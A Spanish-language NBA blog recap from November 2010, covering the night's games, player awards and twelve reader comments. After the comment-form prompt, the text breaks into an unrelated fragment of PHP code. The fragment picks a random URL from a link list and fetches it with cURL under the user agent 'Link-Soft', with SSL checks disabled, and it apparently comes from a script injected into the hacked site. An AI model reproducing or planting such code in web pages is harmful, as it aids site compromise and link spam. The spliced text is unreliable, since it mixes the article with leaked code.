La Crónica (15/11/2010)

16 de November de 2010 por telekoman

La jornada de hoy nos deja la primera derrota de los Hornets que se sitúan con un más que interesante 8-1. Sus verdugos han sido los Dallas Mavericks que únicamente con Nowitzki, 25 puntos y 10 rebotes, y sobre todo Jason Terry, 26 puntos de los cuales al menos 10 fueron en los momentos más calientes, han sido capaces de parar a los de Chris Paul. Los de New Orleans tuvieron la oportunidad de ganar el partido (95-98) pero la dupla de Dallas tuvo más puntería al final.

Después de la machada contra los Lakers, los Suns se llevaron el gato al agua en un partido que tuvieron perdido. Denver tiró por el desagüe los 12 puntos de ventaja con los que alcanzaron el descanso. Los Suns, de la mano de Nash y ayudado por casi todo el equipo, ganaron finalmente por 94-100 pese a que esta vez los triples no entraron.

El otro partido de cierto relumbrón nos dejó la victoria de Ocklahoma en casa de Utah por 115-108. Durant lideró a los suyos con 30 puntos mientras que Westbrook e Ibaka, que está aprovechando estupéndamente la lesión de Green, se fueron hasta los 22, aportando asistencias uno y rebotes el otro. Por Utah los de siempre, Deron y Millsap, pero esta vez flojeó Al Jefferson y los Jazz desaprovecharon la aportunidad de acercarse a la cabeza del Oeste.

Otro partido de infarto, aunque sin la transcendencia del primero fue el Timberwolves – Bobcats. Los de Jordan se llevaron la victoria en casa por un apretado 110-113 con Wallace y Jackson aportando 26 puntos cada uno y siendo importantes en el final del partido. Por Minnesotta el renacido Beasley se fue hasta los 28 puntos, tirándose hasta las zapatillas, y Love alcanzó la veintena.

En el resto de encuentros, Orlando no tuvo ningún problema contra Memphis (72-89), los Warriors ganaron a los Pistons (97-101) aunque los de Detroit casi consiguen remontar los 23 puntos por los que perdían al descanso, y los Nets se llevaron la victoria del Staples frente los Clippers (110-96) en un partido en el que lo más destacado fue la falta flagrante de Harris sobre Griffin que acabó con el primero expulsado y el segundo magullado. Ojito a los Clippers que con el 1-10 que acumulan en el balance se acercan a la marca de los Nets del año pasado.

PREMIOS

MVP: Varios candidatos ilustres como Nowitzki, Terry o Monta Ellis, pero nos vamos a quedar con Kevin Durant (que se le va a hacer, nos gusta este chico) que con 30 puntos, 6 rebotes y 4 asistencias ha logrado liderar a su equipo en la victoria en una plaza complicada como Salt Lake City.

Rookie: Jugaba hoy uno de los dos contendientes principales al premio, Blake Griffin, pero no ha brillado al nivel acostumbrado, posiblemente por el costalazo que se ha llevado cortesía de Devin Harris. En su lugar los otros rookies de los Clippers si han subido sus prestaciones. 15 puntos, 8 rebotes y 6 asistencias para Bledsoe mientras que Aminu ha conseguido 14 puntos y 5 rebotes. Otros como Wesley Johnson o Derrick Favors no pueden decir lo mismo.

Sorpresa: Me van a permitir destacar aquí al “español” Serge Ibaka, que está aprovechando estupendamente la lesión de Green para darse a conocer. 22 puntos y 11 rebotes para él. Otras sorpresas positivas son la recuperación de Tyrus Thomas, 20-10 para él, y la de Stojakovic.

Decepción: Profundamente decepcionante la actuación de Shawn Marion en la victoria de su equipo contra los Hornets. 5 puntos y 6 rebotes en 26 minutos no son suficientes para un jugador que cobra lo que cobra.

Esfuerzo en vano: Varios jugadores optan al premio maldito. Beasley, con 28 puntos sería un buen candidato si no estuvieran Deron Williams o Carmelo Anthony. El primero no ha podido evitar la derrota aunque con 31 puntos, 11 asistencias y 5 rebotes lo ha intentado con todas sus fuerzas. Y Melo se ha dejado comer la tostada logrando eso sí una actuación individual impresionante. 20 puntos y 22 rebotes le contemplan.

Comenta

12 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Hoy ví el Jazz-Thunder. Los Jazz empezaron lanzados y a mitad del primer cuarto ganaban de 12 con 4-4 triples de Deron. Los Thunder capearon el temporal como pudieron con 15 puntos de Durantula en ese primer cuarto. A partir de ahí los Jazz fueron perdiendo fuelle en ataque y los Thunder empezaron a recuperar la delantera de manos de Ibaka (otro gran partido) y de Westbrook que tras una primera parte desastrosa jugó una gran segunda parte. Los Jazz lo intentaron todo de la mano de Deron y la contribución de Millsap pero estuvieron muy solos tras los malos partidos de Jefferson y Kirilenko

      Citar

  2. HeiNeKeN dice:
    #2

    Partidazo de Warrick en ataque hoy, 7-9 en tiros de campo y 7-8 en tiros libres para jugar solo 25 minutos, el mas acertado de unos Suns que hoy han fallado como una escopeta de ferias pero que al final han ganado.

      Citar

  3. HeiNeKeN dice:
    #3

    Por cierto, hoy Durant tambien muy fallon en el tiro pero increible desde los libres, el el jugador que mas libres lleva anotados de la liga y ademas con un porcentaje superior al 90%.

      Citar

  4. LEmontus dice:
    #4

    De momento creo que Warrick si sigue así es candidato claro para sexto hombre.

      Citar

  5. -=TheKing=- dice:
    #5

    Si digo que los Suns van a llegar a los Playoffs es una locura o una posibilidad?? juegan bastante bien en equipo y si warrick o Childress entran en sintonía con Nash y Dragic, pueden hacer un papelón, a Hedo no lo cuento aunque no lo esta haciendo tan mal como en Raptors.

      Citar

  6. LEmontus dice:
    #6

    para i hedo a lo mejor no por números pero si en general lo está haciendo peor que nunca, y mira que hoya ha aparecido cuando tenia que aparecer. Como veis lo de warrick a sexto hombre?

      Citar

  7. Denise dice:
    #7

    Vaya partidito el Magic-Grizzlies. Ganó el que ayer fue menos malo.

      Citar

  8. Tobal dice:
    #8

    Los Suns,me están sorprendiendo gratamente,yo no esperaba este inicio de campaña,pero ahí siguen,por otra parte llegó la primera derrota de los Hornets,en cancha de Dallas Mavericks,con buen partido de Nowitzki y Terry,además me llamó mucho la atención,la actuación de Tyrus Thomas en los Bobcats,con 20 puntos-10 rebotes y 4 tapones,este chico está empezando a mostrar todo lo bueno que se espera de él,a ver si continua así.

      Citar

  9. scriers dice:
    #9

    El primer cuarto de los Grizzlies ayer fue de chiste. Cero circulación, cero aprovechamiento del Pick And Roll, nada de cerebro por parte de Gay que se cargó de balones perdidos y % penosos. A Conley se le fue la mano ayer, pero es que Vasquez estuvo perdido, verdaderamente de pena. En fin, espero que sea un día malísimo y se quede en eso, pero el equipo evidenció muchas lagunas en el juego.

      Citar

  10. Cocinitas dice:
    #10

    Alguien sabe algo de un supuesto interés de los Lakers en Dampier??? creo que seria la guinda a la plantilla de este año ademas que lo veo necesario tras la baja confirmada de Rattlif para 6 semanas.

      Citar

  11. Txusma dice:
    #11

    Pero Dampier no había firmado ya por los Rockets?

      Citar

  12. TheDeerHunter dice:
    #12

    No, fue desestimado hace semanas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>